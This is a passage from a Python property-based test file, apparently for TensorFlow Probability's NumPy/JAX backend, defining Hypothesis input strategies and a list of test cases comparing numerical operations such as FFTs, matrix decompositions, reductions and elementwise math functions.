allow_nan=allow_nan))
rank = len(x.shape)
if allow_multi_axis:
if draw(hps.booleans()): # Use None axis.
axis = None
else:
# Pick a set of distinct axes, then decide whether to index each one from
# the front or from the back.
axis = draw(hps.sets(hps.integers(-rank, -1)))
indexed_from_front = draw(hps.tuples(*[hps.booleans() for _ in axis]))
axis = tuple((ax + rank) if from_front else ax
for (ax, from_front) in zip(axis, indexed_from_front))
else:
axis = draw(hps.integers(-rank, rank - 1))
return x, axis
@hps.composite
def sliceable_and_slices(draw, strategy=None):
x = draw(strategy or single_arrays(shape=shapes(min_dims=1)))
starts = []
sizes = []
for dim in x.shape:
starts.append(draw(hps.integers(0, dim - 1)))
sizes.append(
draw(hps.one_of(hps.just(-1), hps.integers(0, dim - starts[-1]))))
return x, starts, sizes
@hps.composite
def one_hot_params(draw):
indices = draw(single_arrays(dtype=np.int32, elements=hps.integers(0, 8)))
depth = np.maximum(1, np.max(indices)).astype(np.int32)
dtype = draw(hps.sampled_from((onp.int32, onp.float32, onp.complex64)))
on_value = draw(hps.sampled_from((None, 1, 2)))
on_value = on_value if on_value is None else dtype(on_value)
off_value = draw(hps.sampled_from((None, 3, 7)))
off_value = off_value if off_value is None else dtype(off_value)
rank = indices.ndim
axis = draw(hps.one_of(hps.just(None), hps.integers(-1, rank - 1)))
return indices, depth, on_value, off_value, axis, dtype
@hps.composite
def array_and_diagonal(draw):
side = draw(hps.integers(1, 10))
shape = draw(shapes(min_dims=2, min_side=side, max_side=side))
array = draw(hnp.arrays(np.float64, shape, elements=floats(dtype=np.float64)))
diag = draw(hnp.arrays(np.float64, shape[:-1],
elements=floats(dtype=np.float64)))
return array, diag
@hps.composite
def matmul_compatible_pairs(draw,
dtype=np.float64,
x_strategy=None,
elements=None):
elements = elements or floats(dtype=dtype)
x_strategy = x_strategy or single_arrays(
shape=shapes(min_dims=2, max_dims=5), dtype=dtype, elements=elements)
x = draw(x_strategy)
x_shape = tuple(map(int, x.shape))
y_shape = x_shape[:-2] + x_shape[-1:] + (draw(hps.integers(1, 10)),)
y = draw(hnp.arrays(dtype, y_shape, elements=elements))
return x, y
@hps.composite
def pd_matrices(draw, eps=1.):
x = draw(
single_arrays(
shape=shapes(min_dims=2),
elements=floats(min_value=-1e3, max_value=1e3)))
y = np.swapaxes(x, -1, -2)
if x.shape[-1] < x.shape[-2]: # Ensure resultant matrix not rank-deficient.
x, y = y, x
psd = np.matmul(x, y)
return psd + eps * np.eye(psd.shape[-1])
@hps.composite
def nonsingular_matrices(draw):
mat = draw(pd_matrices())
signs = draw(
hnp.arrays(
mat.dtype,
tuple(int(dim) for dim in mat.shape[:-2]) + (1, 1),
elements=hps.sampled_from([-1., 1.])))
return mat * signs
@hps.composite
def batched_probabilities(draw, batch_shape, num_classes):
probs = draw(single_arrays(
batch_shape=batch_shape,
shape=hps.just((num_classes,)),
dtype=np.float32, elements=floats(dtype=np.float32)))
probs = onp.exp(probs - onp.max(
probs, axis=-1, keepdims=True))
return probs / probs.sum(keepdims=True, axis=-1)
def tensorshapes_to_tuples(tensorshapes):
return tuple(tuple(tensorshape.as_list()) for tensorshape in tensorshapes)
@hps.composite
def where_params(draw, version=2):
shape = draw(shapes())
if version == 2:
cond_shape, x_shape, y_shape = draw(
tfp_hps.broadcasting_shapes(shape, 3).map(tensorshapes_to_tuples))
elif version == 1:
max_cond_ndim = min(1, len(shape))
cond_dims = draw(hps.sampled_from(onp.arange(max_cond_ndim + 1)))
cond_shape = shape[:cond_dims]
x_shape, y_shape = shape, shape
else:
raise ValueError('unexpected tf.where version {}'.format(version))
condition = draw(single_arrays(shape=hps.just(cond_shape), dtype=np.bool_))
x = draw(single_arrays(shape=hps.just(x_shape)))
y = draw(single_arrays(shape=hps.just(y_shape), dtype=x.dtype))
return condition, x, y
@hps.composite
def normal_params(draw):
shape = draw(shapes())
arg_shapes = draw(
tfp_hps.broadcasting_shapes(shape, 3).map(tensorshapes_to_tuples))
include_arg = draw(hps.lists(hps.booleans(), min_size=2, max_size=2))
dtype = draw(hps.sampled_from([np.float32, np.float64]))
mean = (
draw(single_arrays(shape=hps.just(arg_shapes[1]), dtype=dtype,
elements=floats(dtype=dtype)))
if include_arg[0] else 0)
stddev = (
draw(single_arrays(shape=hps.just(arg_shapes[2]), dtype=dtype,
elements=positive_floats(dtype=dtype)))
if include_arg[1] else 1)
return (arg_shapes[0], mean, stddev, dtype)
@hps.composite
def uniform_params(draw):
shape = draw(shapes())
arg_shapes = draw(
tfp_hps.broadcasting_shapes(shape, 3).map(tensorshapes_to_tuples))
include_arg = draw(hps.lists(hps.booleans(), min_size=2, max_size=2))
dtype = draw(hps.sampled_from([np.int32, np.int64, np.float32, np.float64]))
if dtype == np.int32 or dtype == np.int64:
# TF RandomUniformInt only supports scalar min/max.
arg_shapes = (arg_shapes[0], (), ())
elements = integers(), integers(min_value=1)
else:
elements = floats(dtype=dtype), positive_floats(dtype=dtype)
minval = (
draw(single_arrays(shape=hps.just(arg_shapes[1]), dtype=dtype,
elements=elements[0]))
if include_arg[0] else dtype(0))
maxval = minval + (
draw(single_arrays(shape=hps.just(arg_shapes[2]), dtype=dtype,
elements=elements[1]))
if include_arg[1] else dtype(10))
return (arg_shapes[0], minval, maxval, dtype)
def gamma_params():
def dict_to_params(d):
return (d['shape'], # sample shape
d['params'][0].astype(d['dtype']), # alpha
(d['params'][1].astype(d['dtype']) # beta (or None)
if d['include_beta'] else None),
d['dtype']) # dtype
return hps.fixed_dictionaries(
dict(shape=shapes(),
# TODO(jburnim): Support generating float64 params.
params=n_same_shape(n=2, elements=positive_floats(dtype=np.float32)),
include_beta=hps.booleans(),
dtype=hps.sampled_from([np.float32, np.float64]))
).map(dict_to_params) # dtype
@hps.composite
def bincount_params(draw):
num_buckets = draw(hps.integers(2, 20))
minlength = draw(hps.one_of(
hps.just(None),
hps.integers(num_buckets, num_buckets + 3),
))
arr = draw(single_arrays(dtype=np.int32,
shape=hps.just(tuple()),
batch_shape=(num_buckets,),
elements=hps.integers(
0, num_buckets - 1)))
weights = draw(hps.one_of(
hps.just(None),
single_arrays(dtype=np.int32,
shape=hps.just(tuple()),
batch_shape=(num_buckets,),
elements=hps.integers(0, 4))))
return arr, weights, minlength
@hps.composite
def confusion_matrix_params(draw):
num_labels = draw(hps.integers(1, 8))
labels = draw(single_arrays(
dtype=np.int32,
shape=hps.just(tuple()),
batch_shape=(num_labels,),
elements=hps.integers(0, num_labels - 1)))
predictions = draw(single_arrays(
dtype=np.int32,
shape=hps.just(tuple()),
batch_shape=(num_labels,),
elements=hps.integers(0, num_labels - 1)))
num_classes = draw(hps.one_of(
hps.just(None),
hps.integers(num_labels, num_labels + 3)))
weights = draw(hps.one_of(
hps.just(None),
single_arrays(dtype=np.int32,
shape=hps.just(tuple()),
batch_shape=(num_labels,),
elements=hps.integers(0, 4))))
return labels, predictions, num_classes, weights
@hps.composite
def gather_params(draw):
params_shape = shapes(min_dims=1)
params = draw(single_arrays(shape=params_shape))
rank = len(params.shape)
# Restricting batch_dims to be positive for now
# Batch dims can only be > 0 if rank > 1
batch_dims = draw(hps.integers(0, max(0, rank - 2)))
# Axis is constrained to be >= batch_dims
axis = draw(hps.one_of(
hps.integers(batch_dims, rank - 1),
hps.integers(-rank + batch_dims, -1),
))
elements = hps.integers(0, params.shape[axis] - 1)
indices_shape = shapes(min_dims=batch_dims + 1)
batch_shape = params.shape[:batch_dims]
indices = draw(single_arrays(dtype=np.int32, elements=elements,
shape=indices_shape,
batch_shape=batch_shape))
return params, indices, None, axis, batch_dims
@hps.composite
def gather_nd_params(draw):
if JAX_MODE:
# Restricting batch_dims to be positive for now
batch_dims = draw(hps.integers(min_value=0, max_value=4))
else:
batch_dims = 0
if batch_dims == 0:
batch_shape = ()
else:
batch_shape = draw(shapes(min_dims=batch_dims, max_dims=batch_dims))
params = draw(single_arrays(
shape=hps.just(batch_shape + draw(shapes(min_dims=1)))
))
params_shape = params.shape
rank = len(params_shape)
indices_shape = draw(hps.integers(min_value=1, max_value=rank - batch_dims))
indices_batch_shape = draw(shapes())
batches = []
for idx in range(indices_shape):
batches.append(
draw(single_arrays(
dtype=np.int32,
elements=hps.integers(
0, params.shape[batch_dims + idx] - 1
),
batch_shape=batch_shape + indices_batch_shape,
shape=hps.just((1,))
))
)
indices = np.concatenate(batches, -1)
return params, indices, batch_dims, None
@hps.composite
def repeat_params(draw):
input_array = draw(single_arrays())
rank = input_array.ndim
low, high = -rank, rank - 1
low, high = min(low, high), max(low, high)
axis = draw(hps.one_of(hps.just(None), hps.integers(low, high)))
if draw(hps.booleans()):
repeats = draw(hps.integers(1, 20))
if draw(hps.booleans()):
repeats = np.array([repeats])
return input_array, repeats, axis
if rank < 1:
repeats_shape = draw(hps.one_of(hps.just(()), hps.just((1,))))
else:
repeats_shape = (input_array.shape[axis] if axis is not None
else np.size(input_array),)
repeats = draw(hnp.arrays(dtype=np.int32, shape=repeats_shape,
elements=hps.integers(1, 20)))
return input_array, repeats, axis
@hps.composite
def linspace_params(draw):
shape = draw(shapes())
arg_shapes = draw(
tfp_hps.broadcasting_shapes(shape, 2).map(tensorshapes_to_tuples))
valid_dtypes = [np.int32, np.int64, np.float32, np.float64, np.complex64]
if not FLAGS.use_tpu:
valid_dtypes.append(np.complex128)
dtype = draw(hps.sampled_from(valid_dtypes))
start = draw(single_arrays(shape=hps.just(arg_shapes[0]), dtype=dtype))
stop = draw(single_arrays(shape=hps.just(arg_shapes[1]), dtype=dtype))
num = draw(hps.integers(0, 13))
axis = draw(hps.integers(-len(shape) - 1, len(shape)))
return Kwargs(start=start, stop=stop, num=num, axis=axis)
@hps.composite
def searchsorted_params(draw):
array_shape = shapes(min_dims=1)
array = draw(single_arrays(shape=array_shape))
# JAX and TF's searchsorted do not behave the same for negative zero, so we
# avoid generating inputs containing negative zero. See b/213512538 .
sorted_array = np.sort(np.where(array == -0.0, 0.0, array))
num_values = hps.integers(1, 20)
values = draw(single_arrays(
shape=shapes(min_dims=1, max_dims=1, max_side=draw(num_values)),
batch_shape=sorted_array.shape[:-1]))
values = np.where(values == -0.0, 0.0, values)
search_side = draw(hps.one_of(hps.just('left'), hps.just('right')))
return sorted_array, values, search_side
@hps.composite
def segment_ids(draw, n):
lengths = []
rsum = 0
while rsum < n:
lengths.append(draw(hps.integers(1, n-rsum)))
rsum += lengths[-1]
return np.repeat(np.arange(len(lengths)), np.array(lengths))
@hps.composite
def segment_params(draw, shape=shapes(min_dims=1), dtype=None, elements=None,
batch_shape=(), unique=False):
a = draw(single_arrays(shape=shape, dtype=dtype, elements=elements,
batch_shape=batch_shape, unique=unique))
ids = draw(segment_ids(a.shape[0]))
return (a, ids)
@hps.composite
def top_k_params(draw):
array_shape = shapes(min_dims=1)
# TODO(srvasude): The unique check can be removed once
# https://github.com/google/jax/issues/2124 is resolved.
array = draw(single_arrays(dtype=np.float32, unique=True, shape=array_shape))
k = draw(hps.integers(1, int(array.shape[-1])))
return array, k
@hps.composite
def histogram_fixed_width_bins_params(draw):
# TODO(b/187125431): the `min_side=2` and `unique` check can be removed if
# https://github.com/tensorflow/tensorflow/pull/38899 is re-implemented.
subnormal_kwarg = _maybe_get_subnormal_kwarg()
values = draw(single_arrays(
dtype=np.float32,
shape=shapes(min_dims=1, min_side=2),
unique=True,
# Avoid intervals containing 0 due to NP/TF discrepancy for bin boundaries
# near 0.
elements=hps.floats(min_value=0., max_value=1e10, width=32,
**subnormal_kwarg),
))
vmin, vmax = np.min(values), np.max(values)
value_min = draw(hps.one_of(
hps.just(vmin),
hps.just(vmin - 3))).astype(np.float32)
value_max = draw(hps.one_of(
hps.just(vmax),
hps.just(vmax + 3))).astype(np.float32)
nbins = draw(hps.integers(2, 10))
return values, [value_min, value_max], nbins
@hps.composite
def histogram_fixed_width_params(draw):
values, [value_min, value_max], nbins = draw(
histogram_fixed_width_bins_params())
return (values,
[value_min, max(value_max,
value_min + np.asarray(.1, value_min.dtype))],
nbins)
@hps.composite
def argsort_params(draw):
dtype = None
if FLAGS.test_mode == 'xla': # Double not supported by XLA TopKV2.
dtype = np.float32
return (
draw(array_axis_tuples(dtype=dtype)) +
(draw(hps.sampled_from(['ASCENDING', 'DESCENDING'])),
True)) # stable sort
@hps.composite
def conv2d_params(draw):
# NCHW is GPU-only
# data_format = draw(hps.sampled_from(['NHWC', 'NCHW']))
data_format = draw(hps.just('NHWC'))
input_shape = draw(shapes(4, 4, min_side=2, max_side=10))
if data_format.startswith('NC'):
channels = input_shape[1]
else:
channels = input_shape[3]
filter_shape = draw(shapes(3, 3, min_side=1, max_side=4))
filter_shape = filter_shape[:2] + (channels, filter_shape[-1])
input_ = draw(
single_arrays(
batch_shape=(),
shape=hps.just(input_shape),
))
filters = draw(single_arrays(
batch_shape=(),
shape=hps.just(filter_shape),
))
small = hps.integers(0, 5)
small_pos = hps.integers(1, 5)
strides = draw(hps.one_of(small_pos, hps.tuples(small_pos, small_pos)))
if isinstance(strides, tuple) and len(strides) == 2 and draw(hps.booleans()):
if data_format.startswith('NC'):
strides = (1, 1) + strides
else:
strides = (1,) + strides + (1,)
zeros = (0, 0)
explicit_padding = (
draw(hps.tuples(small, small)),
draw(hps.tuples(small, small)),
)
if data_format.startswith('NC'):
explicit_padding = (zeros, zeros) + explicit_padding
else:
explicit_padding = (zeros,) + explicit_padding + (zeros,)
padding = draw(
hps.one_of(
hps.just(explicit_padding), hps.sampled_from(['SAME', 'VALID'])))
return (input_, filters, strides, padding, data_format)
@hps.composite
def sparse_xent_params(draw):
num_classes = draw(hps.integers(1, 6))
batch_shape = draw(shapes(min_dims=1))
labels = single_arrays(
batch_shape=batch_shape,
shape=hps.just(tuple()),
dtype=np.int32,
elements=hps.integers(0, num_classes - 1))
subnormal_kwarg = _maybe_get_subnormal_kwarg()
logits = single_arrays(
batch_shape=batch_shape,
shape=hps.just((num_classes,)),
elements=hps.floats(min_value=-1e5, max_value=1e5, width=32,
**subnormal_kwarg))
return draw(
hps.fixed_dictionaries(dict(
labels=labels, logits=logits)).map(Kwargs))
@hps.composite
def xent_params(draw):
num_classes = draw(hps.integers(1, 6))
batch_shape = draw(shapes(min_dims=1))
labels = batched_probabilities(
batch_shape=batch_shape, num_classes=num_classes)
subnormal_kwarg = _maybe_get_subnormal_kwarg()
logits = single_arrays(
batch_shape=batch_shape,
shape=hps.just((num_classes,)),
elements=hps.floats(min_value=-1e5, max_value=1e5, width=32,
**subnormal_kwarg))
return draw(
hps.fixed_dictionaries(dict(
labels=labels, logits=logits)).map(Kwargs))
def _svd_post_process(vals):
# SVDs are not unique, so reconstruct input to test consistency (b/154538680).
# create_uv = False
if not isinstance(vals, tuple):
return vals
# create_uv = True
s, u, v = (np.array(x) for x in vals)
return np.matmul(
u,
s[..., None] *
# Vectorized matrix transpose.
np.swapaxes(v, -2, -1))
@hps.composite
def qr_params(draw):
full_matrices = draw(hps.booleans())
valid_dtypes = [np.float64]
if FLAGS.test_mode != 'xla': # XLA does not support complex QR.
valid_dtypes.append(np.complex128)
dtype = draw(hps.sampled_from(valid_dtypes))
if dtype == np.float64:
elements = floats(min_value=-1e6, max_value=1e6, dtype=dtype)
else:
elements = complex_numbers(min_magnitude=0., max_magnitude=1e6, dtype=dtype)
arr = draw(single_arrays(dtype=dtype, shape=shapes(min_dims=2),
elements=elements))
return arr, full_matrices
def _qr_post_process(qr):
"""Values of q corresponding to zero values of r may have arbitrary values."""
return np.matmul(qr.q, qr.r), np.float32(qr.q.shape), np.float32(qr.r.shape)
def _eig_post_process(vals):
if not isinstance(vals, tuple):
return np.sort(vals, axis=-1)
e, v = vals
return np.einsum('...ab,...b,...bc->...ac', v, e, v.swapaxes(-1, -2))
def _reduce_logsumexp_no_scipy(*args, **kwargs):
def _not_implemented(*args, **kwargs):
raise NotImplementedError()
with mock.patch.object(scipy_special, 'logsumexp', _not_implemented):
return nptf.reduce_logsumexp(*args, **kwargs)
# __Currently untested:__
# broadcast_dynamic_shape
# broadcast_static_shape
# broadcast_to
# math.accumulate_n
# math.betainc
# math.igamma
# math.igammac
# math.lbeta
# math.polyval
# math.zeta
# random.poisson
# random.set_seed
# TODO(jamieas): add tests for these functions.
NUMPY_TEST_CASES = [
TestCase(
'signal.fft', [
single_arrays(
shape=fft_shapes(fft_dim=1),
dtype=np.complex64,
elements=complex_numbers(max_magnitude=1e3))
],
atol=1e-4,
rtol=1e-4,
xla_atol=5e-4),
TestCase(
'signal.fft2d', [
single_arrays(
shape=fft_shapes(fft_dim=2),
dtype=np.complex64,
elements=complex_numbers(max_magnitude=1e3))
],
atol=1e-4,
rtol=1e-4),
TestCase(
'signal.fft3d', [
single_arrays(
shape=fft_shapes(fft_dim=3, max_fft_size=16),
dtype=np.complex64,
elements=complex_numbers(max_magnitude=1e3))
],
atol=2e-3,
rtol=2e-3),
TestCase(
'signal.rfft', [
single_arrays(
shape=fft_shapes(fft_dim=1),
dtype=np.float32,
elements=floats(min_value=-1e3, max_value=1e3,
dtype=np.float32))
],
atol=1e-4,
rtol=1e-4,
xla_atol=3e-4),
TestCase(
'signal.rfft2d', [
single_arrays(
shape=fft_shapes(fft_dim=2),
dtype=np.float32,
elements=floats(min_value=-1e3, max_value=1e3,
dtype=np.float32))
],
atol=1e-3,
rtol=1e-3),
TestCase(
'signal.rfft3d', [
single_arrays(
shape=fft_shapes(fft_dim=3, max_fft_size=16),
dtype=np.float32,
elements=floats(min_value=-1e3, max_value=1e3,
dtype=np.float32))
],
atol=1e-2,
rtol=2e-3),
TestCase(
'signal.ifft', [
single_arrays(
shape=fft_shapes(fft_dim=1),
dtype=np.complex64,
elements=complex_numbers(max_magnitude=1e3))
],
atol=1e-4,
rtol=1e-4),
TestCase(
'signal.ifft2d', [
single_arrays(
shape=fft_shapes(fft_dim=2),
dtype=np.complex64,
elements=complex_numbers(max_magnitude=1e3))
],
atol=1e-4,
rtol=1e-4),
TestCase(
'signal.ifft3d', [
single_arrays(
shape=fft_shapes(fft_dim=3, max_fft_size=16),
dtype=np.complex64,
elements=complex_numbers(max_magnitude=1e3))
],
atol=1e-4,
rtol=1e-4),
TestCase(
'signal.irfft', [
single_arrays(
shape=fft_shapes(fft_dim=1),
dtype=np.complex64,
elements=complex_numbers(max_magnitude=1e3))
],
atol=3e-4,
rtol=3e-4),
TestCase(
'signal.irfft2d', [
single_arrays(
shape=fft_shapes(fft_dim=2),
dtype=np.complex64,
elements=complex_numbers(max_magnitude=5e2))
],
atol=2e-4,
rtol=2e-4),
TestCase(
'signal.irfft3d', [
single_arrays(
shape=fft_shapes(fft_dim=3, max_fft_size=16),
dtype=np.complex64,
elements=complex_numbers(max_magnitude=1e3))
],
atol=4e-4,
rtol=4e-4),
# ArgSpec(args=['a', 'b', 'transpose_a', 'transpose_b', 'adjoint_a',
# 'adjoint_b', 'a_is_sparse', 'b_is_sparse', 'name'],
# varargs=None,
# keywords=None,
# defaults=(False, False, False, False, False, False, None))
TestCase('linalg.matmul', [matmul_compatible_pairs()]),
TestCase(
'linalg.eig', [pd_matrices()],
post_processor=_eig_post_process,
xla_disabled=True),
TestCase('linalg.eigh', [pd_matrices()], post_processor=_eig_post_process),
TestCase(
'linalg.eigvals', [pd_matrices()],
post_processor=_eig_post_process,
xla_disabled=True),
TestCase(
'linalg.eigvalsh', [pd_matrices()], post_processor=_eig_post_process),
TestCase(
'linalg.det', [nonsingular_matrices()], rtol=1e-3,
xla_disabled=True), # TODO(b/162937268): missing kernel.
# ArgSpec(args=['a', 'name', 'conjugate'], varargs=None, keywords=None)
TestCase('linalg.matrix_transpose',
[single_arrays(shape=shapes(min_dims=2))]),
TestCase('linalg.trace', [nonsingular_matrices()]),
# ArgSpec(args=['a', 'x', 'name'], varargs=None, keywords=None,
# defaults=(None,))
TestCase(
'math.polygamma', [
hps.tuples(hps.integers(0, 10).map(float), positive_floats()),
],
disabled=JAX_MODE,
xla_disabled=True), # TODO(b/163880625): Polygamma kernel
# ArgSpec(args=['arr', 'weights', 'minlength',
# 'maxlength', 'dtype', 'name'],
# varargs=None,
# keywords=None,
# defaults=(None, None, None, tf.int32, None))
TestCase('math.bincount', [bincount_params()],
xla_disabled=True), # missing kernel.
TestCase(
'math.confusion_matrix', [confusion_matrix_params()],
xla_disabled=True), # broken string-using assert.
TestCase('math.top_k', [top_k_params()], xla_const_args=(1,)),
# ArgSpec(args=['chol', 'rhs', 'name'], varargs=None, keywords=None,
# defaults=(None,))
TestCase('linalg.cholesky_solve', [
matmul_compatible_pairs(
x_strategy=pd_matrices().map(np.linalg.cholesky))
]),
# ArgSpec(args=['tensor', 'full_matrices', 'compute_uv', 'name'],
# varargs=None,
# keywords=None,
# defaults=(False, True, None))
TestCase(
'linalg.svd', [single_arrays(
shape=shapes(min_dims=2),
elements=floats(min_value=-1e10, max_value=1e10))],
post_processor=_svd_post_process),
TestCase(
'linalg.qr', [
qr_params(),
],
post_processor=_qr_post_process,
xla_const_args=(1,)), # full_matrices
# ArgSpec(args=['coeffs', 'x', 'name'], varargs=None, keywords=None,
# defaults=(None,))
TestCase('math.polyval', []),
# ArgSpec(args=['diagonal', 'name'], varargs=None, keywords=None,
# defaults=(None,))
TestCase('linalg.diag', [single_arrays(shape=shapes(min_dims=1))]),
# ArgSpec(args=['features', 'name'], varargs=None, keywords=None,
# defaults=(None,))
TestCase('math.softsign', [single_arrays()]),
# ArgSpec(args=['input', 'axis', 'keepdims', 'dtype', 'name'], varargs=None,
# keywords=None, defaults=(None, None, tf.int64, None))
TestCase('math.count_nonzero', [single_arrays()]),
# ArgSpec(args=['input', 'axis', 'output_type', 'name'], varargs=None,
# keywords=None, defaults=(None, tf.int64, None))
TestCase('math.argmax', [array_axis_tuples()], xla_const_args=(1,)),
TestCase('math.argmin', [array_axis_tuples()], xla_const_args=(1,)),
# ArgSpec(args=['input', 'diagonal', 'name'], varargs=None, keywords=None,
# defaults=(None,))
TestCase('linalg.set_diag', [array_and_diagonal()]),
# ArgSpec(args=['input', 'name'], varargs=None, keywords=None,
# defaults=(None,))
TestCase('math.angle',
[single_arrays(dtype=np.complex64, elements=complex_numbers())]),
TestCase('math.imag',
[single_arrays(dtype=np.complex64, elements=complex_numbers())]),
TestCase('math.real',
[single_arrays(dtype=np.complex64, elements=complex_numbers())]),
TestCase('linalg.cholesky', [pd_matrices()]),
TestCase(
'linalg.lu',
[nonsingular_matrices()],
rtol=1e-4,
# TODO(b/161242015) do not disable unconditionally. Was
# disabled=NUMPY_MODE and six.PY2
disabled=True),
TestCase('linalg.diag_part', [single_arrays(shape=shapes(min_dims=2))]),
TestCase(
'raw_ops.MatrixDiagPartV2', [
hps.fixed_dictionaries(
dict(
input=single_arrays(shape=shapes(min_dims=2, min_side=2)),
k=hps.sampled_from([-1, 0, 1]),
padding_value=hps.just(0.))).map(Kwargs)
],
xla_const_args=('k',)),
TestCase('identity', [single_arrays()]),
# ArgSpec(args=['input', 'num_lower', 'num_upper', 'name'], varargs=None,
# keywords=None, defaults=(None,))
TestCase('linalg.band_part', [
hps.tuples(
single_arrays(shape=shapes(min_dims=2, min_side=3)),
hps.integers(min_value=-1, max_value=3),
hps.integers(min_value=-1, max_value=3))
]),
# ArgSpec(args=['input', 'shape', 'name'], varargs=None, keywords=None,
# defaults=(None,))
TestCase('broadcast_to', []),
# ArgSpec(args=['input_tensor', 'axis', 'keepdims', 'name'], varargs=None,
# keywords=None, defaults=(None, False, None))
TestCase(
'math.reduce_all', [
array_axis_tuples(
single_arrays(
shape=shapes(min_dims=1),
dtype=np.bool_,
elements=hps.booleans()),
allow_multi_axis=True)
],
xla_const_args=(1,)),
TestCase(
'math.reduce_any', [
array_axis_tuples(
single_arrays(
shape=shapes(min_dims=1),
dtype=np.bool_,
elements=hps.booleans()))
],
xla_const_args=(1,)),
TestCase(
'math.reduce_logsumexp', [array_axis_tuples(allow_multi_axis=True)],
xla_const_args=(1,)),
TestCase(
'math.reduce_logsumexp_no_scipy',
[array_axis_tuples(allow_multi_axis=True)],
xla_const_args=(1,),
tensorflow_function=tf.math.reduce_logsumexp,
numpy_function=_reduce_logsumexp_no_scipy,
disabled=JAX_MODE, # JAX always has scipy.
),
TestCase(
'math.reduce_max', # TODO(b/171070692): TF produces nonsense with NaN.
[array_axis_tuples(allow_nan=False, allow_multi_axis=True)],
xla_const_args=(1,)),
TestCase(
'math.reduce_mean', [array_axis_tuples(allow_multi_axis=True)],
xla_const_args=(1,)),
TestCase(
'math.reduce_min', # TODO(b/171070692): TF produces nonsense with NaN.
[array_axis_tuples(allow_nan=False, allow_multi_axis=True)],
xla_const_args=(1,)),
TestCase(
'math.reduce_prod', [
array_axis_tuples(allow_multi_axis=True),
array_axis_tuples(dtype=np.int32, allow_multi_axis=True)
],
xla_const_args=(1,)),
TestCase(
'math.reduce_std',
[array_axis_tuples(elements=floats(-1e6, 1e6), allow_multi_axis=True)],
xla_const_args=(1,)),
TestCase(
'math.reduce_sum', [
array_axis_tuples(allow_multi_axis=True),
array_axis_tuples(dtype=np.int32, allow_multi_axis=True)
],
xla_const_args=(1,)),
TestCase(
'math.reduce_variance',
[array_axis_tuples(elements=floats(-1e6, 1e6), allow_multi_axis=True)],
xla_const_args=(1,)),
TestCase('math.segment_max', [segment_params()],
xla_disabled=True), # No SegmentMax kernel.
TestCase(
'math.segment_mean',
[segment_params()],
# need jax.numpy.bincount
disabled=JAX_MODE,
xla_disabled=True), # No SegmentMean kernel.
TestCase('math.segment_min', [segment_params()],
xla_disabled=True), # No SegmentMin kernel.
TestCase('math.segment_prod', [segment_params()],
xla_disabled=True), # No SegmentProd kernel.
TestCase('math.segment_sum', [segment_params()],
xla_disabled=True), # TODO(b/165608758): No SegmentSum kernel.
# ArgSpec(args=['inputs', 'name'], varargs=None, keywords=None,
# defaults=(None,))
TestCase(
'math.add_n',
[hps.integers(1, 5).flatmap(lambda n: hps.tuples(n_same_shape(n=n)))]),
# ArgSpec(args=['inputs', 'shape', 'tensor_dtype', 'name'], varargs=None,
# keywords=None, defaults=(None, None, None))
TestCase('math.accumulate_n', []),
# ArgSpec(args=['logits', 'axis', 'name'], varargs=None, keywords=None,
# defaults=(None, None))
TestCase(
'math.log_softmax', [
single_arrays(
shape=shapes(min_dims=1),
elements=floats(
min_value=-1e6,
max_value=1e6,
allow_nan=False,
allow_infinity=False))
],
xla_rtol=1e-4),
TestCase('math.softmax', [
single_arrays(
shape=shapes(min_dims=1),
elements=floats(
min_value=-1e6,
max_value=1e6,
allow_nan=False,
allow_infinity=False))
]),
# ArgSpec(args=['matrix', 'rhs', 'lower', 'adjoint', 'name'], varargs=None,
# keywords=None, defaults=(True, False, None))
TestCase('linalg.triangular_solve', [
matmul_compatible_pairs(
x_strategy=pd_matrices().map(np.linalg.cholesky))
]),
# ArgSpec(args=['shape_x', 'shape_y'], varargs=None, keywords=None,
# defaults=None)
TestCase('broadcast_dynamic_shape', []),
TestCase('broadcast_static_shape', []),
# ArgSpec(args=['value', 'dtype', 'dtype_hint', 'name'], varargs=None,
# keywords=None, defaults=(None, None, None))
TestCase('convert_to_tensor', [single_arrays()]),
# ArgSpec(args=['x', 'axis', 'exclusive', 'reverse', 'name'], varargs=None,
# keywords=None, defaults=(0, False, False, None))
TestCase(
'math.cumprod', [
hps.tuples(array_axis_tuples(), hps.booleans(),
hps.booleans()).map(lambda x: x[0] + (x[1], x[2]))
],
xla_const_args=(1, 2, 3)),
TestCase(
'math.cumsum', [
hps.tuples(
array_axis_tuples(
elements=floats(min_value=-1e12, max_value=1e12)),
hps.booleans(),
hps.booleans()).map(lambda x: x[0] + (x[1], x[2]))
],
xla_const_args=(1, 2, 3)),
]
NUMPY_TEST_CASES += [ # break the array for pylint to not timeout.
# args=['input', 'name']
TestCase('linalg.adjoint', [
single_arrays(
shape=shapes(min_dims=2),
dtype=np.complex64,
elements=complex_numbers())
]),
TestCase('linalg.slogdet', [nonsingular_matrices()],
xla_disabled=True), # TODO(b/162937268): No kernel.
# ArgSpec(args=['x', 'name'], varargs=None, keywords=None, defaults=(None,))
TestCase('complex', [
n_same_shape(n=2, dtype=np.float32),
n_same_shape(n=2, dtype=np.float64)
]),
TestCase('math.abs', [single_arrays()]),
TestCase('math.acos', [single_arrays(elements=floats(-1., 1.))]),
TestCase('math.acosh', [single_arrays(elements=positive_floats())]),
TestCase('math.asin', [single_arrays(elements=floats(-1., 1.))]),
TestCase('math.asinh', [single_arrays(elements=positive_floats())]),
TestCase('math.atan', [single_arrays()]),
TestCase('math.atanh', [single_arrays(elements=floats(-1., 1.))]),
TestCase(
'math.bessel_i0', [single_arrays(elements=floats(-50., 50.))],
disabled=JAX_MODE,
xla_disabled=True), # Missing BesselI0 kernel.
TestCase('math.bessel_i0e', [single_arrays(elements=floats(-50., 50.))]),
TestCase(
'math.bessel_i1', [single_arrays(elements=floats(-50., 50.))],
disabled=JAX_MODE,
xla_disabled=True), # Missing BesselI1 kernel.
TestCase('math.bessel_i1e', [single_arrays(elements=floats(-50., 50.))]),
TestCase('math.ceil', [single_arrays()]),
TestCase('math.conj',
[single_arrays(dtype=np.complex64, elements=complex_numbers())]),
TestCase('math.cos', [single_arrays()]),
TestCase('math.cosh', [single_arrays(elements=floats(-100., 100.))]),
TestCase('math.digamma',
[single_arrays(elements=non_zero_floats(-1e4, 1e4))],
rtol=5e-5),
TestCase('math.erf', [single_arrays()]),
TestCase('math.erfc', [single_arrays()]),
TestCase('math.erfinv', [single_arrays(elements=floats(-1., 1.))]),
TestCase(
'math.exp', # TODO(b/147394924): max_value=1e3
[single_arrays(elements=floats(min_value=-1e3, max_value=85))]),
TestCase('math.expm1',
[single_arrays(elements=floats(min_value=-1e3, max_value=1e3))]),
TestCase('math.floor', [single_arrays()]),
